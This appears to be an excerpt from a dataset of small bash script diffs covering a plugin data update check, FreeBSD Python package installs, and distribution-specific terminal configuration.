--- +++ @@ -32,13 +32,15 @@ mv ./data/plugins.new.json ./data/plugins.json -if ! git diff-index --quiet HEAD --; then +if [ -n "$(git status --porcelain)" ]; then + echo "INFO: There are plugin updates" git add ./data/plugins.json git commit -m 'Updating plugin data' git push origin master ...
bash
d_bash_7998
--- +++ @@ -14,8 +14,9 @@ # Install some dependencies pkg_add -r gmake -F && \ -pkg_add -r python -F && \ +pkg_add -r python27 -F && \ pkg_add -r bash -F && \ +pkg_add -r py27-pip -F && \ ln -sf /usr/local/bin/python /usr/bin/python && \ pip install PyYAML Jinja2 || fail_and_exit
bash
d_bash_7999
--- +++ @@ -28,4 +28,12 @@ fi } -setup_urxvt +local distro=`whichdistro` +if [[ $distro == "debian" ]];then + setup_gnome_terminal_config +elif [[ $distro == "redhat" ]];then + setup_gnome_terminal_config +elif [[ $distro == "arch" ]];then + setup_urxvt +fi +
bash